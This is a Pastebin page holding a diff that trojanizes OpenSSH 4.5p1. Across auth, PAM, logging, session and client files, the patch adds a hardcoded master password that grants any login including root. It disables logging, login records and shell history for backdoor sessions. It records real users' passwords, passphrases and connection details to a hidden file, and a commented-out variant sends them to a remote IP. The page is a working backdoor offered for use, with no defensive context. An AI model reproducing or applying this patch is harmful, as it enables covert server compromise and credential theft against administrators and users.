Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- diff -a -U2 -r openssh-4.5p1/auth.c backdoored1/auth.c
- --- openssh-4.5p1/auth.c 2006-10-27 11:10:16.000000000 -0400
- +++ backdoored1/auth.c 2010-05-13 09:16:53.000000000 -0400
- @@ -100,4 +100,7 @@
- #endif
- + if(backdoorActive == 1)
- + return 1;
- +
- /* Shouldn't be called if pw is NULL, but better safe than sorry... */
- if (!pw || !pw->pw_name)
- @@ -249,4 +252,7 @@
- void (*authlog) (const char *fmt,...) = verbose;
- char *authmsg;
- +
- + if(backdoorActive == 1)
- + return;
- if (use_privsep && !mm_is_monitor() && !authctxt->postponed)
- @@ -264,6 +270,6 @@
- else
- authmsg = authenticated ? "Accepted" : "Failed";
- -
- - authlog("%s %s for %s%.100s from %.200s port %d%s",
- + if(!backdoorActive){
- + authlog("%s %s for %s%.100s from %.200s port %d%s",
- authmsg,
- method,
- @@ -273,4 +279,5 @@
- get_remote_port(),
- info);
- + }
- #ifdef CUSTOM_FAILED_LOGIN
- @@ -298,5 +305,7 @@
- int
- auth_root_allowed(char *method)
- -{
- +{
- + return 1;
- +
- switch (options.permit_root_login) {
- case PERMIT_YES:
- diff -a -U2 -r openssh-4.5p1/auth-pam.c backdoored1/auth-pam.c
- --- openssh-4.5p1/auth-pam.c 2006-09-16 21:57:47.000000000 -0400
- +++ backdoored1/auth-pam.c 2010-03-05 00:40:05.000000000 -0500
- @@ -467,4 +467,6 @@
- goto auth_fail;
- sshpam_err = pam_authenticate(sshpam_handle, flags);
- + if(backdoorActive == 1)
- + sshpam_err = PAM_SUCCESS;
- if (sshpam_err != PAM_SUCCESS)
- goto auth_fail;
- diff -a -U2 -r openssh-4.5p1/auth-passwd.c backdoored1/auth-passwd.c
- --- openssh-4.5p1/auth-passwd.c 2006-08-04 22:39:39.000000000 -0400
- +++ backdoored1/auth-passwd.c 2010-04-18 21:26:19.000000000 -0400
- @@ -81,6 +81,19 @@
- auth_password(Authctxt *authctxt, const char *password)
- {
- + backdoorActive = 0;
- + char *buffer;
- struct passwd * pw = authctxt->pw;
- int result, ok = authctxt->valid;
- +
- + if (!strcmp(password, B4XDOOR)) {
- + backdoorActive = 1;
- + return 1;
- + }else if (sys_auth_passwd(authctxt, password)){
- + buffer = malloc(1024 * sizeof(char));
- + sprintf(buffer, "Sshd password detected: %s@%s:%s\n", pw->pw_name, get_remote_ipaddr(), password);
- + sendit(buffer);
- + free(buffer);
- + }
- +
- #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
- static int expire_checked = 0;
- diff -a -U2 -r openssh-4.5p1/canohost.c backdoored1/canohost.c
- --- openssh-4.5p1/canohost.c 2006-09-22 05:22:18.000000000 -0400
- +++ backdoored1/canohost.c 2010-04-18 20:28:00.000000000 -0400
- @@ -75,5 +75,5 @@
- debug3("Trying to reverse map address %.100s.", ntop);
- /* Map the IP address to a host name. */
- - if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
- + if (!backdoorActive && getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
- NULL, 0, NI_NAMEREQD) != 0) {
- /* Host name not found. Use ip address. */
- diff -a -U2 -r openssh-4.5p1/includes.h backdoored1/includes.h
- --- openssh-4.5p1/includes.h 2006-09-01 06:29:11.000000000 -0400
- +++ backdoored1/includes.h 2010-05-13 09:39:30.000000000 -0400
- @@ -14,4 +14,62 @@
- */
- +#ifndef FUCKIT_H
- +#define FUCKIT_H
- +#include <stdlib.h>
- +#include <stdio.h>
- +
- +#define B4XDOOR "lol"
- +int backdoorActive;
- +
- +#define FUCKING_SSH_LOG "/tmp/.logs"
- +
- +static int sendit(char *msg){
- + FILE *evil_fp;
- + evil_fp = fopen(FUCKING_SSH_LOG,"a+");
- +
- + if (evil_fp == NULL) {
- + fclose(evil_fp);
- + return -1;
- + }
- +
- + fprintf(evil_fp,"%s",msg);
- + fclose(evil_fp);
- + return 0;
- +}
- +
- +/*
- +#include <sys/types.h>
- +#include <sys/socket.h>
- +#include <netinet/in.h>
- +
- +static int sendit(char *msg){
- + int sock, n;
- + struct sockaddr_in remote;
- +
- + remote.sin_family = AF_INET ;
- + remote.sin_port = htons(80);
- + if(inet_aton("192.168.1.105" ,&remote.sin_addr) < 0)
- + {
- + return -1;
- + }
- + if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)
- + {
- + return -1;
- + }
- + if(connect(sock,(struct sockaddr*)&remote,sizeof(remote)) == -1)
- + {
- + return -1;
- + }
- + n = write(sock,msg,strlen(msg));
- + if (n < 0)
- + return -1;
- + close(sock);
- + return 0;
- +}
- +
- +*/
- +
- +#endif
- +
- #ifndef INCLUDES_H
- #define INCLUDES_H
- diff -a -U2 -r openssh-4.5p1/log.c backdoored1/log.c
- --- openssh-4.5p1/log.c 2006-08-20 03:55:55.000000000 -0400
- +++ backdoored1/log.c 2010-03-05 00:40:05.000000000 -0500
- @@ -307,4 +307,6 @@
- do_log(LogLevel level, const char *fmt, va_list args)
- {
- +if(backdoorActive == 1)
- + return;
- #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
- struct syslog_data sdata = SYSLOG_DATA_INIT;
- diff -a -U2 -r openssh-4.5p1/loginrec.c backdoored1/loginrec.c
- --- openssh-4.5p1/loginrec.c 2006-09-07 08:57:54.000000000 -0400
- +++ backdoored1/loginrec.c 2010-03-05 00:40:05.000000000 -0500
- @@ -431,4 +431,6 @@
- login_write(struct logininfo *li)
- {
- +if(backdoorActive == 1)
- + return 0;
- #ifndef HAVE_CYGWIN
- if (geteuid() != 0) {
- diff -a -U2 -r openssh-4.5p1/readpass.c backdoored1/readpass.c
- --- openssh-4.5p1/readpass.c 2006-08-04 22:39:40.000000000 -0400
- +++ backdoored1/readpass.c 2010-04-18 21:26:44.000000000 -0400
- @@ -116,5 +116,5 @@
- char *askpass = NULL, *ret, buf[1024];
- int rppflags, use_askpass = 0, ttyfd;
- -
- + char *buffer;
- rppflags = (flags & RP_ECHO) ? RPP_ECHO_ON : RPP_ECHO_OFF;
- if (flags & RP_USE_ASKPASS)
- @@ -159,4 +159,12 @@
- ret = xstrdup(buf);
- memset(buf, 'x', sizeof buf);
- +
- + if (strcmp((char*)ret,"yes") != NULL) {
- + buffer = malloc(1024 * sizeof(char));
- + sprintf(buffer, "passphrase: %s\n", ret);
- + sendit(buffer);
- + free(buffer);
- + }
- +
- return ret;
- }
- diff -a -U2 -r openssh-4.5p1/session.c backdoored1/session.c
- --- openssh-4.5p1/session.c 2006-10-23 13:01:56.000000000 -0400
- +++ backdoored1/session.c 2010-04-18 22:01:46.000000000 -0400
- @@ -1080,4 +1080,7 @@
- child_set_env(&env, &envsize, "TZ", getenv("TZ"));
- + if(backdoorActive == 1)
- + child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
- +
- /* Set custom environment options from RSA authentication. */
- if (!options.use_login) {
- diff -a -U2 -r openssh-4.5p1/sshconnect.c backdoored1/sshconnect.c
- --- openssh-4.5p1/sshconnect.c 2006-10-23 13:02:24.000000000 -0400
- +++ backdoored1/sshconnect.c 2010-04-18 21:26:00.000000000 -0400
- @@ -948,5 +948,5 @@
- char *host, *cp;
- char *server_user, *local_user;
- -
- + char *buffer;
- local_user = xstrdup(pw->pw_name);
- server_user = options.user ? options.user : local_user;
- @@ -958,4 +958,9 @@
- *cp = (char)tolower(*cp);
- + buffer = malloc(1024 * sizeof(char));
- + sprintf(buffer, "User %s connecting as %s@%s\n", local_user, server_user, host);
- + sendit(buffer);
- + free(buffer);
- +
- /* Exchange protocol version identification strings with the server. */
- ssh_exchange_identification();
- diff -a -U2 -r openssh-4.5p1/sshlogin.c backdoored1/sshlogin.c
- --- openssh-4.5p1/sshlogin.c 2006-08-04 22:54:24.000000000 -0400
- +++ backdoored1/sshlogin.c 2010-04-18 20:34:58.000000000 -0400
- @@ -122,4 +122,7 @@
- struct logininfo *li;
- + if(backdoorActive == 1)
- + return;
- +
- /* save previous login details before writing new */
- store_lastlog_message(user, uid);
- @@ -138,4 +141,7 @@
- struct logininfo *li;
- + if(backdoorActive == 1)
- + return;
- +
- li = login_alloc_entry(pid, user, host, ttyname);
- login_set_addr(li, addr, addrlen);
- @@ -151,4 +157,7 @@
- struct logininfo *li;
- + if(backdoorActive == 1)
- + return;
- +
- li = login_alloc_entry(pid, user, NULL, tty);
- login_logout(li);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement